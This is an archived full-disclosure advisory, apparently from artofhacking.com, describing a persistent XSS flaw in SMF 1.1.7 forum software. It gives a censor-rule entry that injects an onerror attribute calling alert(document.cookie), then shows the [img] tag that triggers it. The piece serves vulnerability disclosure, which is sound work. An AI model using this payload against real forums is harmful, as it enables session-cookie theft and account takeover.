AOH :: HP Unsorted S :: VA2503.HTM

SMF 1.1.7 Persistent XSS (requires permision to edit censor)



SMF 1.1.7 Persistent XSS (requires permision to edit censor)
SMF 1.1.7 Persistent XSS (requires permision to edit censor)



SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor 

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie) 

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img] 

And the HTML code generated will be..
src="http://www.test-xss/" onerror="alert(document.cookie)" 
alt="" border="0" />

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/ 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.